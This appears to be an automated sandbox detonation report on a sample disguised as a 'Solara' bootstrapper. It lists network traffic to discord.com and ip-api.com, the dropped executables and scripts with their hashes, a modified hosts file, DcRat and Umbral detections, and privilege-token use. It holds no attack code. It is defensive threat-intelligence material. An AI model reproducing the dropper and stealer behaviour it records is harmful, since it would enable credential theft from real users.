| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/3552-0-0x00007FFB58523000-0x00007FFB58525000-memory.dmp
memory/3552-1-0x00000000003D0000-0x000000000072C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 084ab0f114778618e30666e451581845 |
| SHA1 | 0013eacb10d1f89dff71296defa5db17704d3347 |
| SHA256 | 8cf0041d9b5a8ab1fa037c475de20ba1389711d9d4e80fb9638138840f28c649 |
| SHA512 | 0c20196d8810e5c05c1b0b284804c7aa5f05a41bdcf19eb3c983702f8b176fb6e4000e3b3b2ec1da9f8973c9bc0feca9e4446817731104d174c0ba1fdd85cd06 |
memory/3552-10-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
| MD5 | c05f91c69a98089ded3951424da86771 |
| SHA1 | 0c4c6437efad5f0e1e3e290fb0a9c069cd4a86ed |
| SHA256 | 94c820d3a1216c2ea30f7960f60d8324399a522d3e090711aafc6f5d0b860ac5 |
| SHA512 | 3ba5631dcc8b839ec1d75a408b10047c3a6713791caa5b7d0fa4df69fcd264df50424404d410727c532de77fc95c082faad3cebae1637c87a146c9bf5979fcc7 |
memory/1028-25-0x000002C375CB0000-0x000002C375CF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
| MD5 | 97bec430634bb8e59d4273c9a395a702 |
| SHA1 | a8a04f26cec00ef32501ebe35252d08aaa7e3634 |
| SHA256 | 57a2fe6374ced2c9c7e2be59d3eca0815188778308e59295d6a868d3e5c4237e |
| SHA512 | 8563d6608337071a89f7b0b7739001a456be19c51dea0f715317c6dbfce9986c59527f39ec7cdcc71007abdd8955996d26835105712e80cd700e086b8d1165a9 |
memory/3440-35-0x0000000000610000-0x00000000007C2000-memory.dmp
memory/1028-36-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
memory/3552-37-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
memory/3440-32-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe
| MD5 | fb6995d84ff8765f8985b39021495a02 |
| SHA1 | da911e465774c0769bc5b6fb10801c08e769b607 |
| SHA256 | 048d54b81f8126090f61d30d736d677fe62a4eb683b5a7618c91020e7fc10ff5 |
| SHA512 | ea763e3864f726cd58979dee75100cce8692e81ca67fbbcf863f5244c7a127580b71588a2675bc108599109e8e77af7351f85900d0afb65acb98eeb4100632db |
memory/684-47-0x000001A5EA350000-0x000001A5EA372000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cx5biz4n.b2x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3440-70-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/1028-86-0x000002C3783E0000-0x000002C378456000-memory.dmp
memory/1028-87-0x000002C3784B0000-0x000002C378500000-memory.dmp
memory/1028-88-0x000002C378360000-0x000002C37837E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 985b3105d8889886d6fd953575c54e08 |
| SHA1 | 0f9a041240a344d82bac0a180520e7982c15f3cd |
| SHA256 | 5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d |
| SHA512 | 0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SolaraBootstrapper.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/1028-126-0x000002C3783A0000-0x000002C3783AA000-memory.dmp
memory/1028-127-0x000002C378460000-0x000002C378472000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dIIhost.exe.log
| MD5 | 4c8fa14eeeeda6fe76a08d14e08bf756 |
| SHA1 | 30003b6798090ec74eb477bbed88e086f8552976 |
| SHA256 | 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5 |
| SHA512 | 116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d2932b2d6c762219b89d39dd11312e00 |
| SHA1 | 00889ebbf99006d613f52ebbe020aa929047704f |
| SHA256 | 97265e6a6d22bb41ad2a3da792f17177fb4193212fc61758473ce5179103b92a |
| SHA512 | 549b5f6ade05038909090dea05f2a314e4ff3e3e88adb3a9d414ccab7dcd17ab5db6598f8df3fdd1e4b45ccd0be28b27153f16cc775c9a584056c7ea25238901 |
memory/1028-164-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\WinRAR\jLO855Jnqn959BA8qy.bat
| MD5 | cbad1e030a37190ced948f45d7582691 |
| SHA1 | b1590dc4a67cd1b56b6b0ff42d48325de7bb8ea5 |
| SHA256 | 8d910a7da0bc8d3baf495648cc0fef5391e8d7486cfc027827d3828a488f7571 |
| SHA512 | ce98091245080506c15afd1eba8847e410b43c689ef38b4c971881a0888588cbac39234d73f783ad4f4f113c7fe07d066d4f5e1a2181854b70a032f4308fca92 |
C:\WinRAR\UnZiper.exe
| MD5 | c06bb1f0ea507c8d8767f269725df3c0 |
| SHA1 | 9555e62e99b3bd5af80e7870ab15c38dc97c1757 |
| SHA256 | 43d0e85345ce2caf4c9b2805c7e5da6a6f7c523f256a46cfeebea9a0eb4f5dce |
| SHA512 | 0a14e81ab09263b75f4be83f11cfcd1e9bc903d22aeeae0bf797a97bb261e5700a55bcc3e65ff48a41c01170686e42a756bfabb1769d0efd2b58e62d83bb6197 |
memory/628-169-0x0000000000480000-0x0000000000652000-memory.dmp
memory/628-170-0x0000000002740000-0x000000000274E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8916e154c5f09e8e26780ab9a279d25f |
| SHA1 | 25b1b7a637cb3f57329efbfccdc9ed9b67da30b2 |
| SHA256 | 3881bf61c694a3f517c78904a36efff7812c2664d4965de471b36737f7c90075 |
| SHA512 | 38baf68637754aee48205a854eb7f74619390e6bc1fcb0cdcc397a696ce7441d9f9e90ed7a66c22c6fc073eacc17cd7e45afeab833b2909f92259a2bc1b8a26f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UnZiper.exe.log
| MD5 | 5cb90c90e96a3b36461ed44d339d02e5 |
| SHA1 | 5508281a22cca7757bc4fbdb0a8e885c9f596a04 |
| SHA256 | 34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb |
| SHA512 | 63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 4028457913f9d08b06137643fe3e01bc |
| SHA1 | a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14 |
| SHA256 | 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58 |
| SHA512 | c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5824a6037c081fda5d46de274b6e2799 |
| SHA1 | 526367a09300cbde430e8fb44e41cbe7a0937aac |
| SHA256 | 4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f |
| SHA512 | a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 227556da5e65f6819f477756808c17e4 |
| SHA1 | 6ffce766e881ca2a60180bb25f4981b183f78279 |
| SHA256 | 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4 |
| SHA512 | d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15dd61188e01dff83e0f47d441b21af5 |
| SHA1 | e26521b9eb5c21dd9b9bfb69618e7c80e4847bc9 |
| SHA256 | 2f1d635b20401a13d3e43f797200c4b99d2dadbb1e01e6ab8cc5348783b193c6 |
| SHA512 | e40ad249392a90107d5448bee92ef45bf9164c2a106a39d2ea7b93ce22fce72af8a6732bac83fef32fbaefd915d51a0143c3e7409e74b17e0ce063c6d32100ed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 724bc7abdbaa4bb021d728aac3000af1 |
| SHA1 | 8bb319c3ef68cf5db7d56a1e397c94ca65d2cce6 |
| SHA256 | 07d38b887ae11e664a613dc698d8de4771dec3cdb7837d59b00f421114e27c04 |
| SHA512 | 501872716cea55c46ccb0c5ccf6835733f84e5a653a285729b6757c38952a582985fb7c76643cda0b32390ea9bca4de35d2fbe34ba1c6f3106f803225cafd88e |
C:\Users\Admin\AppData\Local\Temp\JipzecQmszbCJX3
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Temp\x1dZQdFlu5oiJDr
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\VoUbehJLiQRPcfk
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\VoUbehJLiQRPcfk
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0b8cb2e6dd5794b6a56a4bdbbd430fd7 |
| SHA1 | 2b08e348c3489c6a35761af073018e3784c12074 |
| SHA256 | bcce0d44e33747e4c39df9afbd0a4e98a47ded0188375e4dfdd94cafbb366e1f |
| SHA512 | 15ce3b588aa80899f69b0313c7e188d886bddbd09783ca732ac33f9ae8e4e017a72b6f98919f581383a4582732575e5faedb0dea87e01cf2b657424945fdf4d2 |
C:\Users\Admin\AppData\Local\Temp\WGP0m3Wo7NZp8LM\Display\Display.png
| MD5 | d4b4ba038423239047a9130a6a741659 |
| SHA1 | a0d511e38fc7e0112d3237257b87211e5b9d0d51 |
| SHA256 | ee0f530848adf85e4d4d51fc8ab61df06faa59a980637e80bbce32377c37d8d1 |
| SHA512 | c370d44d83acdd599de432538717948be1f837940fa2d3d54fe34caa75e0030154e6d1c0fae96894c685c333e280b0fd526d3d5899f16b37ac32b440dd9a519c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 548dd08570d121a65e82abb7171cae1c |
| SHA1 | 1a1b5084b3a78f3acd0d811cc79dbcac121217ab |
| SHA256 | cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc |
| SHA512 | 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6aae9fb57ebd2ae201e8d174d820246 |
| SHA1 | 58140d968de47bcf9c78938988a99369bbdb1f51 |
| SHA256 | bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08 |
| SHA512 | 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 966914e2e771de7a4a57a95b6ecfa8a9 |
| SHA1 | 7a32282fd51dd032967ed4d9a40cc57e265aeff2 |
| SHA256 | 98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba |
| SHA512 | dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eeb6ad386d143f278077171fc01a81e8 |
| SHA1 | 43cff1bd7240965bfb2f10e47c0cec0f94332e2d |
| SHA256 | 59d62f9472b4c00b7cae0ee702789fa2b0042c468e4de9421d2430f9973eb00d |
| SHA512 | b40f003e6d97adaaf05809f06d12df01984943d9eb6c44eaeffef90df8de0040373150c9714b11a42db5189b7064eeed0609a39f6f1feb91b05dd1835333e8f2 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 04:50
Reported
2024-06-28 04:52
Platform
win7-20240221-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WinRAR\UnZiper.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WinRAR\UnZiper.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
